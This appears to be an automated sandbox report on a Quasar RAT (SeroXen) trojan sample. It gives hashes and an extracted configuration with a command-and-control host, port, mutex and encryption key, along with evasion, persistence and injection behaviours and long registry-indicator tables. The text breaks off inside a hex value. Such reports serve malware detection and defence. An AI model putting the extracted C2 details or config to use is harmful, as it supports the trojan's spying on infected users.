quasar | abcda524c02f9381d8d43f9ec0079d854db821d77f45e88f50606f46871f81d6

Analysis

max time kernel
600s
max time network
601s
platform
windows10-2004_x64
resource
win10v2004-20240508-en
resource tags

arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
submitted
14-05-2024 16:02

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Uni.exe
Size

409KB
MD5

4c2bb0618a6eda615c8001d5a7ccd6c0
SHA1

c88d2c8bfc5906a5cfef78893d1132edcffd71f0
SHA256

abcda524c02f9381d8d43f9ec0079d854db821d77f45e88f50606f46871f81d6
SHA512

6abe53339656a023e2a0547f1c2249789c33091d67a21f2e689c6411dc5357e34ec3c65634b6f6955a5023d20803f7c746b13f574bcd84b008abb4a97ea61027
SSDEEP

12288:rpg6M1i1v6q1ak/e7xlX7nnvGAwhJLJO:lxqiii6xlLvGjhO

Score

10^/10

quasar seroxen spyware trojan

Malware Config

Extracted

Family

quasar

Version

3.1.5

Botnet

SeroXen

tue-jake.gl.at.ply.gg:29058

Mutex

$Sxr-xPAuDxLNyBmZ7S2WLJ

Attributes

encryption_key
Pw78RUs175dFrKD7lMwH
install_name
Client.exe
log_directory
Logs
reconnect_delay
3000
startup_key
SeroXen
subdirectory
SubDir

Signatures

Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar

Quasar payload 2 IoCs

Processes:

resource	yara_rule
behavioral2/memory/2400-1-0x0000000000470000-0x00000000004DC000-memory.dmp	family_quasar
C:\Users\Admin\AppData\Roaming\SubDir\Client.exe	family_quasar

Suspicious use of NtCreateProcessExOtherParentProcess 4 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exe

description	pid	process	target process
PID 4288 created 2780	4288	WerFault.exe	ScreenClippingHost.exe
PID 3896 created 2780	3896	WerFault.exe	ScreenClippingHost.exe
PID 2872 created 3016	2872	WerFault.exe	ScreenClippingHost.exe
PID 1084 created 3016	1084	WerFault.exe	ScreenClippingHost.exe

Suspicious use of NtCreateUserProcessOtherParentProcess 6 IoCs

Processes:

powershell.EXEpowershell.EXEsvchost.exe

description	pid	process	target process
PID 2220 created 612	2220	powershell.EXE	winlogon.exe
PID 4804 created 612	4804	powershell.EXE	winlogon.exe
PID 3996 created 2780	3996	svchost.exe	ScreenClippingHost.exe
PID 3996 created 2780	3996	svchost.exe	ScreenClippingHost.exe
PID 3996 created 3016	3996	svchost.exe	ScreenClippingHost.exe
PID 3996 created 3016	3996	svchost.exe	ScreenClippingHost.exe

Downloads MZ/PE file

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

wmiprvse.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	wmiprvse.exe

Executes dropped EXE 4 IoCs

Processes:

Client.exeinstall.exeinstall.exe6Rs8wA3zbw4c.exe

pid process

4996 Client.exe
4904 install.exe
1908 install.exe
4756 6Rs8wA3zbw4c.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service
T1102

Processes:

flow ioc

12 raw.githubusercontent.com
14 raw.githubusercontent.com
22 raw.githubusercontent.com
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

1 ip-api.com

pid	process
4996	Client.exe
4904	install.exe
1908	install.exe
4756	6Rs8wA3zbw4c.exe

flow	ioc
12	raw.githubusercontent.com
14	raw.githubusercontent.com
22	raw.githubusercontent.com

flow	ioc
1	ip-api.com

Drops file in System32 directory 8 IoCs

Processes:

powershell.EXEsvchost.exesvchost.exeOfficeClickToRun.exepowershell.EXE

description	ioc	process
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.EXE
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx	svchost.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml	OfficeClickToRun.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749	svchost.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.EXE
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log	powershell.EXE

Suspicious use of SetThreadContext 2 IoCs

Processes:

powershell.EXEpowershell.EXE

description	pid	process	target process
PID 2220 set thread context of 4332	2220	powershell.EXE	dllhost.exe
PID 4804 set thread context of 4504	4804	powershell.EXE	dllhost.exe

Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

1876 4756 WerFault.exe 6Rs8wA3zbw4c.exe

pid	pid_target	process	target process
1876	4756	WerFault.exe	6Rs8wA3zbw4c.exe

Checks SCSI registry key(s) 3 TTPs 18 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

wmiprvse.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\DeviceDesc	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\ConfigFlags	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\HardwareID	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Mfg	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Mfg	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Service	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000\LogConf	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\CompatibleIDs	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\DeviceDesc	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Service	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000\LogConf	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\CompatibleIDs	wmiprvse.exe

Checks processor information in registry 2 TTPs 18 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe

Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task/Job
T1053

Processes:

schtasks.exeSCHTASKS.exeschtasks.exe

pid process

640 schtasks.exe
976 SCHTASKS.exe
2840 schtasks.exe

pid	process
640	schtasks.exe
976	SCHTASKS.exe
2840	schtasks.exe

Enumerates system info in registry 2 TTPs 13 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

WerFault.exeWerFault.exeWerFault.exewmiprvse.exeWerFault.exeWerFault.exeWerFault.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe

Modifies Internet Explorer settings 1 TTPs 6 IoCs

adware spyware

Modify Registry

T1112

Processes:

svchost.exe

description	ioc	process
Set value (data)	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\SOFTWARE\Microsoft\Internet Explorer\LowRegistry\Audio\PolicyConfig\PropertyStore\98e30521_0\{219ED5A0-9CBF-4F3A-B927-37C9E5C5F14F}\3 = 04000000000000000000803f000000000000000000000000	svchost.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\SOFTWARE\Microsoft\Internet Explorer\LowRegistry\Audio\PolicyConfig\PropertyStore\98e30521_0\{219ED5A0-9CBF-4F3A-B927-37C9E5C5F14F}\4 = 0420000000000000180000000000000000000000000000000000803f0000803f	svchost.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\SOFTWARE\Microsoft\Internet Explorer\LowRegistry\Audio\PolicyConfig\PropertyStore\98e30521_0\{219ED5A0-9CBF-4F3A-B927-37C9E5C5F14F}\5 = 0b0000000000000000000000000000000000000000000000	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\SOFTWARE\Microsoft\Internet Explorer\LowRegistry\Audio\PolicyConfig\PropertyStore\98e30521_0	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\SOFTWARE\Microsoft\Internet Explorer\LowRegistry\Audio\PolicyConfig\PropertyStore\98e30521_0\ = "{2}.\\\\?\\hdaudio#func_01&ven_1af4&dev_0022&subsys_1af40022&rev_1001#{6994ad04-93ef-11d0-a3cc-00a0c9223196}\\elineouttopo/00010001\|\\Device\\HarddiskVolume2\\Users\\Admin\\AppData\\Local\\Temp\\6Rs8wA3zbw4c.exe%b{00000000-0000-0000-0000-000000000000}"	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\SOFTWARE\Microsoft\Internet Explorer\LowRegistry\Audio\PolicyConfig\PropertyStore\98e30521_0\{219ED5A0-9CBF-4F3A-B927-37C9E5C5F14F}	svchost.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

powershell.EXEpowershell.EXEOfficeClickToRun.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.EXE
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor	OfficeClickToRun.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.EXE
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,508368333,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.EXE
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.EXE
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Tue, 14 May 2024 16:10:39 GMT"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE

Modifies registry class 24 IoCs

Processes:

RuntimeBroker.exeRuntimeBroker.exe

description	ioc	process
Key deleted	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\16f91778-c0ec-4664-	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\PersistedStorageItemTable\ManagedByApp	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\PersistedStorageItemTable\MostRecentlyUsed	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\16f91778-c0ec-4664- = e608001019a6da01	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\16f91778-c0ec-4664-	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\16f91778-c0ec-4664- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy"	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\16f91778-c0ec-4664- = "\\\\?\\Volume{A968B372-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\61ce182754cb053782d39cc890128cbada84ad6c7640c6ba0c541165d6407a54"	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\PersistedStorageItemTable	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\00b6c23b-dd71-4adb- = 23719e0f19a6da01	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\00b6c23b-dd71-4adb- = 0114020000000000c0000000000000464c0000000114020000000000c0000000000000468300000020000000bb36960f19a6da01bb36960f19a6da01bb36960f19a6da01000000000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad01320000000000ae5827812000363163653138323735346362303533373832643339636338393031323863626164613834616436633736343063366261306335343131363564363430376135340000b20009000400efbeae582781ae5827812e00000000000000000000000000000000000000000000000000453aca00360031006300650031003800320037003500340063006200300035003300370038003200640033003900630063003800390030003100320038006300620061006400610038003400610064003600630037003600340030006300360062006100300063003500340031003100360035006400360034003000370061003500340000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d0069